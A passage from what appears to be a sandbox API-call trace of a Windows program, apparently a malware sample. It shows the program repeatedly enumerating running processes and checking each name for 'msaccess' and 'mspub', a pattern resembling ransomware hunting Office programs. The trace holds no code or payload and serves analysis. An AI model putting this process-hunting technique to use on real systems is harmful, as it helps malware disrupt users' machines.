[0097.235] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0097.235] StrStrIA (lpFirst="saying.exe", lpSrch="msaccess") returned 0x0 [0097.235] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0097.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.236] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3579068 [0097.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3579068, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0097.236] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0097.236] StrStrIA (lpFirst="ripe.exe", lpSrch="msaccess") returned 0x0 [0097.236] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0097.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.238] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579098 [0097.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3579098, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0097.238] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0097.238] StrStrIA (lpFirst="acoustic.exe", lpSrch="msaccess") returned 0x0 [0097.238] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0097.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.239] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35790c8 [0097.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x35790c8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0097.239] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0097.239] StrStrIA (lpFirst="mail.exe", lpSrch="msaccess") returned 0x0 [0097.239] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.240] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35790e0 [0097.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35790e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0097.240] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0097.240] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="msaccess") returned 0x0 [0097.240] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.241] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579278 [0097.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579278, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.241] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.241] StrStrIA (lpFirst="svchost.exe", lpSrch="msaccess") returned 0x0 [0097.241] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0097.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.242] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579170 [0097.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3579170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.243] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0097.243] StrStrIA (lpFirst="dllhost.exe", lpSrch="msaccess") returned 0x0 [0097.243] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.244] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35791b8 [0097.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x35791b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0097.244] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0097.244] StrStrIA (lpFirst="taskhostw.exe", lpSrch="msaccess") returned 0x0 [0097.244] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0097.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.245] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578fa8 [0097.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3578fa8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0097.245] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0097.245] StrStrIA (lpFirst="UsoClient.exe", lpSrch="msaccess") returned 0x0 [0097.245] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.246] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579050 [0097.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3579050, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0097.246] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0097.246] StrStrIA (lpFirst="taskhostw.exe", lpSrch="msaccess") returned 0x0 [0097.246] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0097.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0097.247] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357aab8 [0097.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357aab8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0097.247] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0097.247] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="msaccess") returned 0x0 [0097.247] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0097.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.248] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a998 [0097.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357a998, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0097.248] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0097.248] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="msaccess") returned 0x0 [0097.248] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0097.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0097.249] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b348 [0097.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356b348, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0097.249] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0097.249] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="msaccess") returned 0x0 [0097.249] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0097.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.250] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578fd8 [0097.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3578fd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.250] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0097.250] StrStrIA (lpFirst="conhost.exe", lpSrch="msaccess") returned 0x0 [0097.250] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0097.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.251] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578ff0 [0097.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3578ff0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.251] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0097.251] StrStrIA (lpFirst="conhost.exe", lpSrch="msaccess") returned 0x0 [0097.251] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0097.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.252] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579008 [0097.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3579008, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0097.252] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0097.252] StrStrIA (lpFirst="rxodge.exe", lpSrch="msaccess") returned 0x0 [0097.252] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0097.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.254] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35790f8 [0097.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x35790f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0097.254] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0097.254] StrStrIA (lpFirst="sppsvc.exe", lpSrch="msaccess") returned 0x0 [0097.254] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0097.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.255] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357abf8 [0097.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357abf8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0097.255] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0097.255] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="msaccess") returned 0x0 [0097.255] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0097.256] CloseHandle (hObject=0x350) returned 1 [0097.256] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0097.275] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0097.276] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357ab58 [0097.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357ab58, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0097.276] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0097.276] StrStrIA (lpFirst="[System Process]", lpSrch="mspub") returned 0x0 [0097.276] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0097.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0097.277] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574ca0 [0097.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574ca0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0097.277] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0097.277] StrStrIA (lpFirst="System", lpSrch="mspub") returned 0x0 [0097.277] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0097.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.279] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35791d0 [0097.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x35791d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0097.279] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0097.279] StrStrIA (lpFirst="smss.exe", lpSrch="mspub") returned 0x0 [0097.279] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.280] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579110 [0097.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3579110, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0097.280] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0097.280] StrStrIA (lpFirst="csrss.exe", lpSrch="mspub") returned 0x0 [0097.280] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0097.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.281] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579128 [0097.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3579128, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0097.281] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0097.281] StrStrIA (lpFirst="wininit.exe", lpSrch="mspub") returned 0x0 [0097.281] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, 